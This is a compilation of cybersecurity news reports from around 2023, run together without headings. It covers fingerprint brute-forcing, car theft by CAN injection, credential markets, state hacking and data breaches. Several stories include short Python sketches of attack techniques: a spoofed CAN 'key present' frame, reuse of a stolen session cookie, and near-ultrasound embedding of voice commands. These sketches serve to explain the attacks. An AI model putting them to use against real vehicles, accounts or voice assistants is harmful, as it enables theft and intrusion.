Chinese researchers say they successfully bypassed fingerprint authentication safeguards on smartphones by staging a brute force attack.
Researchers at Zhejiang University and Tencent Labs capitalized on vulnerabilities of modern smartphone fingerprint scanners to stage their break-in operation, which they named BrutePrint. Their findings are published on the arXiv preprint server.
A flaw in the Match-After-Lock feature, which is supposed to bar authentication attempts once a device enters lockout mode, allowed the researchers to keep submitting an unlimited number of fingerprint samples.
Inadequate protection of biometric data transmitted over the Serial Peripheral Interface (SPI) between the fingerprint sensor and the rest of the phone lets attackers intercept fingerprint images. Samples can also be easily obtained from academic datasets or from biometric data leaks.
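To see why removing the attempt limit matters, consider the arithmetic: even a tiny false-acceptance rate compounds quickly once an attacker can submit samples indefinitely. Below is a minimal sketch of that calculation; the false-acceptance rate and attempt counts are illustrative assumptions, not figures from the paper.

```python
# Rough illustration: probability that at least one of N submitted fingerprint
# samples is falsely accepted, assuming independent attempts and a fixed
# false-acceptance rate (FAR). Both numbers below are assumptions for
# illustration only, not values from the BrutePrint paper.

far = 0.0001  # assumed false-acceptance rate per attempt (0.01%)

for attempts in (50, 1_000, 50_000):
    p_success = 1 - (1 - far) ** attempts
    print(f"{attempts:>6} attempts -> ~{p_success:.1%} chance of a false accept")

# With a hard cap of a handful of attempts the chance stays negligible; with
# the Match-After-Lock and CAMF protections bypassed, the attacker can simply
# keep going until the probability approaches certainty.
```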
[…]
All Android devices and one HarmonyOS (Huawei) device tested by researchers had at least one flaw allowing for break-ins. Because of tougher defense mechanisms in iOS devices, specifically the Apple iPhone SE and iPhone 7, those devices were able to withstand brute-force entry attempts. Researchers noted that the iPhones were susceptible to the Cancel-After-Match-Fail (CAMF) vulnerability, but not to the extent that successful entry could be achieved.
To launch a successful break-in, an attacker requires physical access to a targeted phone for several hours, a printed circuit board easily obtainable for $15, and access to fingerprint images.
Fingerprint databases are available online through academic resources, but hackers are more likely to draw on the massive volumes of images exposed through data breaches.
[…]
More information: Yu Chen et al, BrutePrint: Expose Smartphone Fingerprint Authentication to Brute-force Attack, arXiv (2023). DOI: 10.48550/arxiv.2305.10791
Three digital marketing firms have agreed to pay $615,000 to resolve allegations that they submitted at least 2.4 million fake public comments to influence American internet policy.
New York Attorney General Letitia James announced last week the agreement with LCX, Lead ID, and Ifficient, each of which was found to have fabricated public comments submitted in 2017 to convince the Federal Communications Commission (FCC) to repeal net neutrality.
Net neutrality refers to a policy requiring internet service providers to treat people’s internet traffic more or less equally, which some ISPs opposed because they would have preferred to act as gatekeepers in a pay-to-play regime. The neutrality rules were passed in 2015 at a time when it was feared large internet companies would eventually eradicate smaller rivals by bribing ISPs to prioritize their connections and downplay the competition.
[…]
In 2017, Ajit Pai, appointed chairman of the FCC by the Trump administration, successfully spearheaded an effort to tear up those rules and remake US net neutrality policy so it would be more amenable to broadband giants. And there was a public comment period on the initiative.
It was a massive sham. The Office of the Attorney General (OAG) investigation [PDF] found that 18 million of 22 million comments submitted to the FCC were fake, both for and against net neutrality.
The broadband industry’s attempt in 2017 to have the FCC repeal the net neutrality rules accounted for more than 8.5 million fake comments at a cost of $4.2 million.
“The effort was intended to create the appearance of widespread grassroots opposition to existing net neutrality rules, which — as described in an internal campaign planning document — would help provide ‘cover’ for the FCC’s proposed repeal,” the report explained.
The report also stated an unidentified 19-year-old was responsible for more than 7.7 million of 9.3 million fake comments opposing the repeal of net neutrality. These were generated using software that fabricated identities. The origin of the other 1.6 million fake comments is unknown.
LCX, Lead ID, and Ifficient were said to have taken a different approach, one that allegedly involved reuse of old consumer data from different marketing or advocacy campaigns, purchased or obtained through misrepresentation. LCX is said to have obtained some of its data from “a large data breach file found on the internet.”
[…]
This was the second such agreement for the state of New York, which two years ago got a different set of digital marketing firms – Fluent, Opt-Intelligence, and React2Media – to pay $4.4 million to disgorge funds earned for distributing about 5.4 million fake public comments related to the FCC’s net neutrality process.
[…]
astroturfing – corporate messaging masquerading as grassroots public opinion.
[…]
“no federal laws or regulations exist that limit a public relations firm’s ability to engage in astroturfing.”
An ex-Ubiquiti engineer, Nickolas Sharp, was sentenced to six years in prison yesterday after pleading guilty in a New York court to stealing tens of gigabytes of confidential data, demanding a $1.9 million ransom from his former employer, and then publishing the data publicly when his demands were refused.
[…]
In a court document, Sharp claimed that Ubiquiti CEO Robert Pera had prevented Sharp from “resolving outstanding security issues,” and Sharp told the judge that this led to an “idiotic hyperfixation” on fixing those security flaws.
However, even if that was Sharp’s true motivation, US District Judge Katherine Polk Failla did not accept his justification of his crimes, which include wire fraud, intentionally damaging protected computers, and lying to the FBI.
“It was not up to Mr. Sharp to play God in this circumstance,” Failla said.
US attorney for the Southern District of New York, Damian Williams, argued that Sharp was not a “cybersecurity vigilante” but an “inveterate liar and data thief” who was “presenting a contrived deception to the Court that this entire offense was somehow just a misguided security drill.” Williams said that Sharp made “dozens, if not hundreds, of criminal decisions” and even implicated innocent co-workers to “divert suspicion.” Sharp had also already admitted in pre-sentencing that the cyber attack was planned for “financial gain.” Williams said Sharp did it seemingly out of “pure greed” and ego because Sharp “felt mistreated”—overworked and underpaid—by the IT company.
Court documents show that Ubiquiti spent “well over $1.5 million dollars and hundreds of hours of employee and consultant time” trying to remediate what Williams described as Sharp’s “breathtaking” theft. But the company lost much more than that when Sharp attempted to conceal his crimes—posing as a whistleblower, planting false media reports, and contacting US and foreign regulators to investigate Ubiquiti’s alleged downplaying of the data breach. Within a single day of Sharp planting the false reports, Ubiquiti’s stock plummeted, wiping out over $4 billion in market capitalization, court documents show.
[…]
In his sentencing memo, Williams said that Sharp’s characterization of the cyberattack as a security drill does not align with the timeline of events leading up to his arrest in December 2021. The timeline instead appears to reveal a calculated plan to conceal the data theft and extort nearly $2 million from Ubiquiti.
Sharp began working as a Ubiquiti senior software engineer and “Cloud Lead” in 2018, where he was paid $250,000 annually and had tasks including software development and cloud infrastructure security. About two years into the gig, Sharp purchased a VPN subscription to Surfshark in July 2020 and then seemingly began hunting for another job. By December 9, 2020, he’d lined up another job. The next day, he used his Ubiquiti security credentials to test his plan to copy data repositories while masking his IP address by using Surfshark.
Less than two weeks later, Sharp executed his plan, and he might have gotten away with it if not for a “slip-up” he never could have foreseen. While copying approximately 155 data repositories, an Internet outage temporarily disabled his VPN. When Internet service was restored, unbeknownst to Sharp, Ubiquiti logged his home IP address before the VPN tool could turn back on.
Two days later, Sharp was so bold as to ask a senior cybersecurity employee if he could be paid for submitting vulnerabilities to the company’s HackerOne bug bounty program, which seemed suspicious, court documents show. Still unaware of his slip-up, through December 26, 2020, Sharp continued to access company data using Surfshark, actively covering his trails by deleting evidence of his activity within a day and modifying evidence to make it seem like other Ubiquiti employees were using the credentials he used during the attack.
Sharp only stopped accessing the data when other employees discovered evidence of the attack on December 28, 2020. Seemingly unfazed, Sharp joined the team investigating the attack before sending his ransom email on January 7, 2021.
Ubiquiti chose not to pay the ransom and instead got the FBI involved. Soon after, Sharp’s slip-up showing his home IP put the FBI on his trail. At work, Sharp suggested his home IP was logged in an attempt to frame him, telling coworkers, “I’d be pretty fucking incompetent if I left my IP in [the] thing I requested, downloaded, and uploaded” and saying that would be the “shittiest cover up ever lol.”
While the FBI analyzed all of Sharp’s work devices, Sharp wiped and reset the laptop he used in the attack but brazenly left the laptop at home, where it was seized during a warranted FBI search in March 2021.
After the FBI search, Sharp began posing as a whistleblower, contacting journalists and regulators to falsely warn that Ubiquiti’s public disclosure and response to the cyberattack were insufficient. He said the company had deceived customers and downplayed the severity of the breach, which was actually “catastrophic.” The whole time, Williams noted in his sentencing memo, Sharp knew that the attack had been accomplished using his own employee credentials.
This was “far from a hacker targeting a vulnerability open to third parties,” Williams said. “Sharp used credentials legitimately entrusted to him by the company, to steal data and cover his tracks.”
“At every turn, Sharp acted consistent with the unwavering belief that his sophistication and cunning were sufficient to deceive others and conceal his crime,” Williams said.
Miscreants have infected millions of Androids worldwide with malicious firmware before the devices even shipped from their factories, according to Trend Micro researchers at Black Hat Asia.
This hardware is mainly cheapo Android mobile devices, though smartwatches, TVs, and other things are caught up in it.
The gadgets have their manufacturing outsourced to an original equipment manufacturer (OEM). That outsourcing makes it possible for someone in the manufacturing pipeline – such as a firmware supplier – to infect products with malicious code as they ship out, the researchers said.
This has been going on for a while, we think; for example, we wrote about a similar headache in 2017. The Trend Micro folks characterized the threat today as “a growing problem for regular users and enterprises.” So, consider this a reminder and a heads-up all in one.
[…]
This insertion of malware began as the price of mobile phone firmware dropped, we’re told. Competition between firmware distributors became so furious that eventually the providers could not charge money for their product.
“But of course there’s no free stuff,” said Trend Micro researcher Fyodor Yarochkin, who explained that, as a result of this cut-throat situation, firmware started to come with an undesirable feature – silent plugins. The team analyzed dozens of firmware images looking for malicious software, and found over 80 different plugins, although many of those were not widely distributed.
The plugins that were the most impactful were those that had a business model built around them, were sold on the underground, and marketed in the open on places like Facebook, blogs, and YouTube.
The objective of the malware is to steal information or to make money from the data it collects or delivers.
The malware turns infected devices into proxies that are used to steal and sell SMS messages, hijack social media and online messaging accounts, and monetize traffic through adverts and click fraud.
One type of plugin, the proxy plugin, lets criminals rent out infected devices for up to around five minutes at a time. For example, those renting control of a device could acquire data on keystrokes, geographical location, IP address and more.
[…]
Through telemetry data, the researchers estimated that at least millions of infected devices exist globally, concentrated in Southeast Asia and Eastern Europe. A figure self-reported by the criminals themselves, the researchers said, was around 8.9 million.
As for where the threats are coming from, the duo wouldn’t say specifically, although the word “China” showed up multiple times in the presentation, including in an origin story related to the development of the dodgy firmware. Yarochkin said the audience should consider where most of the world’s OEMs are located and make their own deductions.
“Even though we possibly might know the people who build the infrastructure for this business, it’s difficult to pinpoint how exactly this infection gets put into this mobile phone, because we don’t know for sure at what moment it got into the supply chain,” said Yarochkin.
The team confirmed the malware was found in the phones of at least 10 vendors, and that around 40 more were possibly affected. Those seeking to avoid infected mobile phones can go some way toward protecting themselves by buying higher-end devices.
[…]
“Big brands like Samsung, like Google took care of their supply chain security relatively well, but for threat actors, this is still a very lucrative market,” said Yarochkin.
The Medusa ransomware gang has put online what it claims is a massive leak of internal Microsoft materials, including Bing and Cortana source code.
“This leak is of more interest to programmers, since it contains the source codes of the following Bing products, Bing Maps and Cortana,” the crew wrote on its website, which was screenshotted and shared by Emsisoft threat analyst Brett Callow.
“There are many digital signatures of Microsoft products in the leak. Many of them have not been recalled,” the gang continued. “Go ahead and your software will be the same level of trust as the original Microsoft product.”
Obviously, this could be a dangerous level of trust to give miscreants developing malware. Below is Callow’s summary of the purported dump of source code, presumably obtained or stolen somehow from Microsoft.
#Medusa is sharing what is claimed to be “source codes of the following Bing products, Bing Maps and Cortana.” The leak is ~12GB and likely part of the ~37GB leaked by Lapsus in 2022. #Microsoft 1/2 pic.twitter.com/VpofBJGEcM
To be clear: we don’t know if the files are legit. Microsoft didn’t respond to The Register‘s request for comment, and ransomware gangs aren’t always the most trustworthy sources of information.
“At this point, it’s unclear whether the data is what it’s claimed to be,” Emsisoft’s Callow told The Register. “Also unclear is whether there’s any connection between Medusa and Lapsus$ but, with hindsight, certain aspects of their modus operandi does have a somewhat Lapsus$ish feel.”
He’s referring to a March 2022 security breach in which Lapsus$ claimed it broke into Microsoft’s internal DevOps environment and stole, then leaked, about 37GB of information including what the extortionists claimed to be Bing and Cortana’s internal source code, and WebXT compliance engineering projects.
Microsoft later confirmed Lapsus$ had compromised its systems, and tried to downplay the intrusion by insisting “no customer code or data was involved in the observed activities.”
“Microsoft does not rely on the secrecy of code as a security measure and viewing source code does not lead to elevation of risk,” it added, which is a fair point. Software should be and can be made secure whether its source is private or open.
And Lapsus$, of course, is the possibly extinct extortion gang led by teenagers who went on a cybercrime spree last year before the arrest of its alleged ringleaders. Before that, however, it stole data from Nvidia, Samsung, Okta, and others.
It could be that Medusa is spreading around stuff that was already stolen and leaked.
Shadetree hackers—or, as they’re more commonly called, tech-savvy thieves—have found a new way to steal cars. No, it’s not a relay attack, Bluetooth exploit, key fob replay, or even a USB cable. Instead, these thieves are performing a modern take on hot-wiring without ever ripping apart the steering column.
Crafty criminals have resorted to using specially crafted devices that simply plug into the wiring harness behind the headlight of a victim’s car. Once they’re plugged in, they’re able to unlock, start, and drive away before the owner even catches wind of what’s going on.
Last year, Ian Tabor, who runs the UK chapter of Car Hacking Village, had his Toyota RAV4 stolen from outside of his home near London. Days prior to the theft, he found that thieves had damaged his car without successfully taking it. It wasn’t quite clear if it was a case of vandalism, or if the thieves had tried to make off with the car’s front bumper, but he did notice that the headlight harness had been yanked out.
Ultimately, the thieves returned and made off with his car. And after Tabor’s RAV4 was stolen, so was his neighbor’s Toyota Land Cruiser. But, folks, this is 2023. It’s not like you can just hotwire a car and drive away as the movies suggest. This got Tabor curious—after all, hacking cars is something he does for fun. How exactly did the thieves make off with his car?
Tabor got to work with Toyota’s “MyT” app. This is Toyota’s telematics system, which pumps diagnostic trouble codes (DTCs) up to the automaker’s servers rather than forcing you to plug a code reader into the car’s OBD2 port. Upon investigation, Tabor noticed that his RAV4 kicked off a ton of DTCs just prior to being stolen—one of which was for the computer that controls the car’s exterior lighting.
This led Tabor to wonder if the thieves somehow made use of the vehicle CAN Bus network to drive away with his car. After scouring the dark web, Tabor was able to locate expensive tools claiming to work for various automakers and models, including BMW, Cadillac, Chrysler, Fiat, Ford, GMC, Honda, Jeep, Jaguar, Lexus, Maserati, Nissan, Toyota, as well as Volkswagen. The cost? As much as $5,400, but that’s a drop in the bucket if they can actually deliver on the promise of enabling vehicle theft.
Tabor decided to order one of these devices to try out himself. Together with Ken Tindell, the CTO of Canis Automotive Labs, the duo tore down a device to find out what made it tick and published a writeup of their findings.
As it turns out, the expensive device was made up of just $10 in components. The real magic is in the programming, which injects fake CAN messages into the car’s actual CAN Bus network. The messages essentially trick the car into thinking a trusted key is present, convincing the CAN gateway (the component that filters CAN messages into their appropriate segmented networks) to pass along messages instructing the car to disable its immobilizer and unlock the doors, letting the thieves simply drive away.
What’s more, the device looked like an ordinary portable speaker. The guts were stuffed inside the shell of a JBL-branded Bluetooth speaker, and all the thief needs to do is power it on.
Once the device is on and plugged in, it wakes up the CAN network by sending a frame—much as the car does when you pull a door handle, approach with a passive entry key, or press a button on your fob. It then listens for a specific CAN message to begin its attack, and emulates a hardware error that tricks other ECUs on the network into pausing their transmissions, giving the attacking device priority to send its spoofed messages.
That pause in valid traffic is the device’s window to attack. It sends spoofed “valid key present” messages to the gateway, making the car think an actual valid key is being used to control the vehicle. The attacker then simply presses the speaker’s “play” button, and the car’s doors are unlocked.
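For readers unfamiliar with CAN injection, the sketch below shows what transmitting a spoofed frame onto a CAN bus looks like in practice, using the python-can library on Linux (SocketCAN). The arbitration ID and payload are hypothetical placeholders; the real “valid key present” messages, IDs, and timing used by these theft devices are not public and vary by vehicle.

```python
# Conceptual sketch of CAN frame injection with python-can (SocketCAN, Linux).
# The arbitration ID and payload below are hypothetical placeholders; the
# actual "key is present" messages differ by make, model, and bus segment.
import time

import can  # pip install python-can

bus = can.interface.Bus(channel="can0", bustype="socketcan")

# Hypothetical frame pretending to come from the smart-key ECU.
spoofed_key_frame = can.Message(
    arbitration_id=0x0A5,            # placeholder ID
    data=[0x01, 0xFF, 0x00, 0x00],   # placeholder "valid key present" payload
    is_extended_id=False,
)

# Classic CAN has no sender authentication: any node on the bus can transmit
# any ID, so a device spliced in behind a headlight is as "trusted" as the
# key ECU itself.
for _ in range(20):
    bus.send(spoofed_key_frame)
    time.sleep(0.05)  # repeat roughly every 50 ms, as a real ECU would

bus.shutdown()
```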
Given that the manufacturers of these CAN injection devices claim they are effective against a myriad of makes and models, this appears to be an industry-wide problem that may take some brainstorming to fix.
The good news is that this type of attack can be thwarted. While there are quick-and-dirty countermeasures that could eventually be defeated again, the more durable fix is for an automaker to cryptographically protect its CAN Bus network. According to Tindell, Canis is working on a project to retrofit US military vehicles with such a scheme, much like the one he suggests for commercial vehicles experiencing this issue.
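Neither Canis’s scheme nor the automakers’ eventual fixes are public in detail, but the general shape of cryptographic CAN protection is easy to sketch: each frame carries a truncated message authentication code computed with a shared key over a counter and the payload, so a spoofed frame injected at a headlight connector fails verification. The key handling, counter scheme, and frame layout below are simplified assumptions, not any vendor’s real design.

```python
# Illustrative sketch of authenticated CAN payloads: a truncated HMAC over
# (counter || payload) travels with the data, and receivers reject any frame
# whose tag does not verify or whose counter goes backwards (replay).
# Key distribution, counter sync, and the frame layout are simplified
# assumptions here, not any vendor's real design.
import hashlib
import hmac

SHARED_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")  # provisioned to ECUs
TAG_LEN = 4  # classic CAN leaves little room, so tags are truncated


def protect(counter: int, payload: bytes) -> bytes:
    msg = counter.to_bytes(4, "big") + payload
    tag = hmac.new(SHARED_KEY, msg, hashlib.sha256).digest()[:TAG_LEN]
    return payload + tag


def verify(counter: int, frame: bytes, last_counter: int) -> bool:
    payload, tag = frame[:-TAG_LEN], frame[-TAG_LEN:]
    expected = hmac.new(
        SHARED_KEY, counter.to_bytes(4, "big") + payload, hashlib.sha256
    ).digest()[:TAG_LEN]
    return counter > last_counter and hmac.compare_digest(tag, expected)


frame = protect(counter=42, payload=b"\x01\xff\x00\x00")
print(verify(42, frame, last_counter=41))                   # True: genuine ECU
print(verify(42, b"\x01\xff\x00\x00" + b"\x00" * TAG_LEN, 41))  # False: spoofed frame
```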
Several law enforcement agencies have teamed up to take down Genesis Market, a website selling access to “over 80 million account access credentials,” which included the standard usernames and passwords, as well as much more dangerous data like session tokens. According to a press release from the US Department of Justice, the site was seized on Tuesday. The European Union Agency for Law Enforcement Cooperation (or Europol) says that 119 of the site’s users have been arrested.
Genesis Marketplace has been around since 2018, according to the Department of Justice, and was “one of the most prolific initial access brokers (IABs) in the cybercrime world.” It let hackers search for certain types of credentials, such as ones for social media accounts, bank accounts, etc., as well as search for credentials based on where in the world they came from.
The agencies have teamed up with HaveIBeenPwned.com to make it easy for the public to check if their login credentials were stolen, and I’d highly recommend doing so — because of the way Genesis worked, this isn’t the typical “just change your password and you’ll be fine” scenario. For instructions on how to check whether Genesis was selling your stolen info, check out the writeup from Troy Hunt, who runs HaveIBeenPwned.
(The TL;DR is that you should sign up for HIBP’s email notification service with all of your important email addresses, and then be sure to click the “Verify email” button in the confirmation email. Just searching for your email on the site won’t tell you if you were impacted.)
[…]
While Genesis Marketplace traded in usernames and passwords, it also sold access to users’ cookies and browser fingerprints as well, which could let hackers bypass protections like two-factor authentication. Cookies — or login tokens, to be specific — are files that websites store on your computer to show that you’ve already logged in by correctly entering your password and two-factor authentication information. They’re the reason you don’t have to log into a website each time you visit it. (They’re also the reason that the joint effort to take down Genesis was given the delightful codename “Operation Cookie Monster.”)
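To illustrate why stolen login tokens are so dangerous, the snippet below shows how a session cookie, once obtained, can simply be attached to a fresh HTTP client and reused; no password or two-factor prompt is involved. The domain, cookie name, and token are hypothetical, purely for illustration.

```python
# Why stolen session cookies bypass passwords and 2FA: the server only checks
# that a token it previously issued is present and still valid. The domain,
# cookie name, and token below are hypothetical.
import requests

stolen_token = "eyJhbGciOi..."  # captured by infostealer malware on the victim's PC

session = requests.Session()
session.cookies.set("sessionid", stolen_token, domain="example.com")

# The request arrives looking exactly like the victim's own logged-in browser:
# no password entry, no two-factor challenge.
resp = session.get("https://example.com/account")
print(resp.status_code)
```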
[…]
Genesis stole the fingerprints, too. What’s more, it even provided a browser extension that let hackers spoof the victim’s fingerprint while using their login cookie to gain access to an account, according to a 2019 report from ZDNET.
A unit of the Russian military intelligence service GRU has hacked routers belonging to Dutch private individuals and small and medium-sized businesses, the Dutch Military Intelligence and Security Service (MIVD) has discovered, writes de Volkskrant.
The routers are part of a worldwide attack network and can be used, for example, to disrupt or paralyze the networks of ministries. It is estimated that thousands of hacked devices worldwide are in the hands of the Russian unit; in the Netherlands, this would involve several dozen routers.
The hacked devices are the more advanced kind of router, often found at small businesses. The Russian unit takes over the routers and can then monitor and control them, investigative journalist Huib Modderkolk told NOS Radio 1 Journaal.
According to him, this unit was created to carry out sabotage: “It is also called the most dangerous hacking group in the world.”
‘We know what you’re doing’
The MIVD discovered the digital attack because the service came across many Dutch IP addresses. According to Modderkolk, the victims often do not realize that they have been hacked. Routers left on their default settings or protected by a simple password are easy to hack. The affected individuals and companies have now been informed by the MIVD.
It is striking that the MIVD makes this information public: “They hope for more awareness that this is actually going on, but the aim is also to let the Russians know: ‘we know what you are doing’”. According to Modderkolk, this is a development of recent years, and the British and Americans are also increasingly disclosing this type of sensitive information.
Disinformation and cyber threats
The National Coordinator for Counterterrorism and Security (NCTV) has already warned of disinformation and cyber threats in connection with the war in Ukraine. These cyber attacks could affect the communication system of banks or hospitals, among others. At the moment there are no specific threats, but due to the rapid developments of the war, this could change quickly.
It is not clear whether the Russian group’s hacking campaign is connected to the war in Ukraine.
[…] The software engineers behind these systems are employees of NTC Vulkan. On the surface, it looks like a run-of-the-mill cybersecurity consultancy. However, a leak of secret files from the company has exposed its work bolstering Vladimir Putin’s cyberwarfare capabilities.
Thousands of pages of secret documents reveal how Vulkan’s engineers have worked for Russian military and intelligence agencies to support hacking operations, train operatives before attacks on national infrastructure, spread disinformation and control sections of the internet.
The company’s work is linked to the federal security service or FSB, the domestic spy agency; the operational and intelligence divisions of the armed forces, known as the GOU and GRU; and the SVR, Russia’s foreign intelligence organisation.
A diagram showing a Vulkan hacking reconnaissance system codenamed Scan, developed since 2018.
One document links a Vulkan cyber-attack tool with the notorious hacking group Sandworm, which the US government said twice caused blackouts in Ukraine, disrupted the Olympics in South Korea and launched NotPetya, the most economically destructive malware in history. Codenamed Scan-V, it scours the internet for vulnerabilities, which are then stored for use in future cyber-attacks.
Another system, known as Amezit, amounts to a blueprint for surveilling and controlling the internet in regions under Russia’s command, and also enables disinformation via fake social media profiles. A third Vulkan-built system – Crystal-2V – is a training program for cyber-operatives in the methods required to bring down rail, air and sea infrastructure. A file explaining the software states: “The level of secrecy of processed and stored information in the product is ‘Top Secret’.”
The Vulkan files, which date from 2016 to 2021, were leaked by an anonymous whistleblower angered by Russia’s war in Ukraine. Such leaks from Moscow are extremely rare. Days after the invasion in February last year, the source approached the German newspaper Süddeutsche Zeitung and said the GRU and FSB “hide behind” Vulkan.
[…]
Five western intelligence agencies confirmed the Vulkan files appear to be authentic. The company and the Kremlin did not respond to multiple requests for comment.
The leak contains emails, internal documents, project plans, budgets and contracts. They offer insight into the Kremlin’s sweeping efforts in the cyber-realm, at a time when it is pursuing a brutal war against Ukraine. It is not known whether the tools built by Vulkan have been used for real-world attacks, in Ukraine or elsewhere.
[…]
Some documents in the leak contain what appear to be illustrative examples of potential targets. One contains a map showing dots across the US. Another contains the details of a nuclear power station in Switzerland.
A map of the US found in the leaked Vulkan files as part of the multi-faceted Amezit system.
One document shows engineers recommending Russia add to its own capabilities by using hacking tools stolen in 2016 from the US National Security Agency and posted online.
John Hultquist, the vice-president of intelligence analysis at the cybersecurity firm Mandiant, which reviewed selections of the material at the request of the consortium, said: “These documents suggest that Russia sees attacks on civilian critical infrastructure and social media manipulation as one and the same mission, which is essentially an attack on the enemy’s will to fight.”
[…]
One of Vulkan’s most far-reaching projects was carried out with the blessing of the Kremlin’s most infamous unit of cyberwarriors, known as Sandworm. According to US prosecutors and western governments, over the past decade Sandworm has been responsible for hacking operations on an astonishing scale. It has carried out numerous malign acts: political manipulation, cyber-sabotage, election interference, dumping of emails and leaking.
Sandworm disabled Ukraine’s power grid in 2015. The following year it took part in Russia’s brazen operation to derail the US presidential election. Two of its operatives were indicted for distributing emails stolen from Hillary Clinton’s Democrats using a fake persona, Guccifer 2.0. Then in 2017 Sandworm purloined further data in an attempt to influence the outcome of the French presidential vote, the US says.
That same year the unit unleashed the most consequential cyber-attack in history. Operatives used a bespoke piece of malware called NotPetya. Beginning in Ukraine, NotPetya rapidly spread across the globe. It knocked offline shipping firms, hospitals, postal systems and pharmaceutical manufacturers – a digital onslaught that spilled over from the virtual into the physical world.
[…]
Hacking groups such as Sandworm penetrate computer systems by first looking for weak spots. Scan-V supports that process, conducting automated reconnaissance of potential targets around the world in a hunt for potentially vulnerable servers and network devices. The intelligence is then stored in a data repository, giving hackers an automated means of identifying targets.
[…]
One part of Amezit is domestic-facing, allowing operatives to hijack and take control of the internet if unrest breaks out in a Russian region, or the country gains a stronghold over territory in a rival nation state, such as Ukraine. Internet traffic deemed to be politically harmful can be removed before it has a chance to spread.
A 387-page internal document explains how Amezit works. The military needs physical access to hardware, such as mobile phone towers, and to wireless communications. Once they control transmission, traffic can be intercepted. Military spies can identify people browsing the web, see what they are accessing online, and track information that users are sharing.
[…]
the firm developed a bulk collection program for the FSB called Fraction. It combs sites such as Facebook or Odnoklassniki – the Russian equivalent – looking for key words. The aim is to identify potential opposition figures from open source data.
[…]
This Amezit sub-system allows the Russian military to carry out large-scale covert disinformation operations on social media and across the internet, through the creation of accounts that resemble real people online, or avatars. The avatars have names and stolen personal photos, which are then cultivated over months to curate a realistic digital footprint.
The leak contains screenshots of fake Twitter accounts and hashtags used by the Russian military from 2014 until earlier this year. They spread disinformation, including a conspiracy theory about Hillary Clinton and a denial that Russia’s bombing of Syria killed civilians. Following the invasion of Ukraine, one Vulkan-linked fake Twitter account posted: “Excellent leader #Putin”.
A tweet from a fake social media account linked to Vulkan.
Another Vulkan-developed project linked to Amezit is far more threatening. Codenamed Crystal-2V, it is a training platform for Russian cyber-operatives. Capable of allowing simultaneous use by up to 30 trainees, it appears to simulate attacks against a range of essential national infrastructure targets: railway lines, electricity stations, airports, waterways, ports and industrial control systems.
American university researchers have developed a novel attack called “Near-Ultrasound Inaudible Trojan” (NUIT) that can launch silent attacks against devices powered by voice assistants, like smartphones, smart speakers, and other IoT devices.
The team of researchers consists of professor Guenevere Chen of the University of Texas at San Antonio (UTSA), her doctoral student Qi Xia, and professor Shouhuai Xu of the University of Colorado Colorado Springs (UCCS).
The team demonstrated NUIT attacks against modern voice assistants found inside millions of devices, including Apple’s Siri, Google’s Assistant, Microsoft’s Cortana, and Amazon’s Alexa, showing the ability to send malicious commands to those devices.
Inaudible attacks
The main principle that makes NUIT effective and dangerous is that microphones in smart devices can respond to near-ultrasound waves that the human ear cannot, thus performing the attack with minimal risk of exposure while still using conventional speaker technology.
In a post on UTSA’s site, Chen explained that NUIT could be incorporated into websites that play media or YouTube videos, so tricking targets into visiting these sites or playing malicious media on trustworthy sites is a relatively simple case of social engineering.
The researchers say the NUIT attacks can be conducted using two different methods.
The first method, NUIT-1, is when a device is both the source and target of the attack. For example, an attack can be launched on a smartphone by playing an audio file that causes the device to perform an action, such as opening a garage door or sending a text message.
The other method, NUIT-2, is when the attack is launched by a device with a speaker to another device with a microphone, such as a website to a smart speaker.
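The core trick is that a command recorded as ordinary audio can be shifted up near the edge of human hearing, where device microphones still respond but people don’t notice. The snippet below sketches that idea by amplitude-modulating a recorded command onto a roughly 21 kHz carrier; it is a generic illustration of near-ultrasound embedding, not the researchers’ exact NUIT waveform, and whether any given speaker and microphone pair actually responds depends on the hardware.

```python
# Generic near-ultrasound embedding sketch (not the exact NUIT method):
# amplitude-modulate a recorded voice command onto a ~21 kHz carrier.
# Whether a given speaker can emit it and a given microphone picks it up
# depends entirely on the hardware involved.
import numpy as np
from scipy.io import wavfile

rate, command = wavfile.read("command.wav")   # assumed mono 16-bit recording
command = command.astype(np.float64)
command /= np.max(np.abs(command))            # normalize to [-1, 1]

carrier_hz = 21_000                           # near-ultrasound
assert rate >= 2 * carrier_hz, "need a 44.1/48 kHz (or higher) recording"

t = np.arange(len(command)) / rate
carrier = np.sin(2 * np.pi * carrier_hz * t)
modulated = (0.5 + 0.5 * command) * carrier   # simple AM

wavfile.write("nuit_demo.wav", rate, (modulated * 32767).astype(np.int16))
```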
Health data and other personal information of members of Congress and staff were stolen during a breach of servers run by DC Health Link and are now up for sale on the dark web.
The FBI is investigating the intrusion, which came to light Wednesday after Catherine Szpindor, the House of Representatives’ chief administrative officer, sent a letter to House members telling them of the incident. Szpindor wrote that she was alerted to the hack by the FBI and US Capitol Police.
DC Health Link is the online marketplace for the Affordable Care Act that administers the healthcare plans for members of Congress as well as their family and staff.
Szpindor called the incident “a significant data breach” that exposed the personally identifiable information (PII) of thousands of DC Health Link customers and warned the Representatives that their data may have been compromised.
“Currently, I do not know the size and scope of the breach,” she wrote, adding the FBI informed her that account information and PII of “hundreds” of House and staff members were stolen. Once Szpindor has a list of the data taken, she will directly contact those people affected.
[…]
“Thousands of House Members and employees from across the United States have enrolled in health insurance through DC Health Link for themselves and their families since 2014,” McCarthy and Jeffries wrote. “The size and scope of impacted House customers could be extraordinary.”
Szpindor in her letter recommended House members consider freezing their credit at Equifax, Experian, and TransUnion until the breadth of the breach is known, particularly which representatives and staff members had their data compromised.
According to CNBC, the Senate may also have been impacted by the breach, with an email sent to offices on that side of Congress saying the Senate Sergeant at Arms was told of the breach by law enforcement and that the “data included the full names, date of enrollment, relationship (self, spouse, child), and email address, but no other Personally Identifiable Information (PII).”
The FBI in a terse statement to the media said it was “aware of this incident and is assisting. This is an ongoing investigation.” Capitol Police said they were working with the FBI.
[…]
At least some of the PII taken during the breach found its way onto a dark web marketplace. In their letter, McCarthy and Jeffries noted the FBI was able to buy the PII and other enrollee information that was breached. The information included names of spouses and dependent children, Social Security numbers, and home addresses.
CNBC said a post on a dark web site put up for sale the data of 170,000 Health Link members and posted data from 11 users as a sample.
[…]
Organizations in the healthcare field have come under increasing attacks in recent years, which is unsurprising given the vast amounts of PII and health data – from medical records to Social Security numbers – they hold on doctors, staff, and patients.
Cybersecurity firm Check Point in a report said the number of cyberattacks around the world jumped 38 percent year-over-year in 2022 and that healthcare, education and research, and government were the top three targeted sectors.
BlackLotus, a UEFI bootkit that’s sold on hacking forums for about $5,000, can now bypass Secure Boot, making it the first known malware to run on Windows systems even with the firmware security feature enabled.
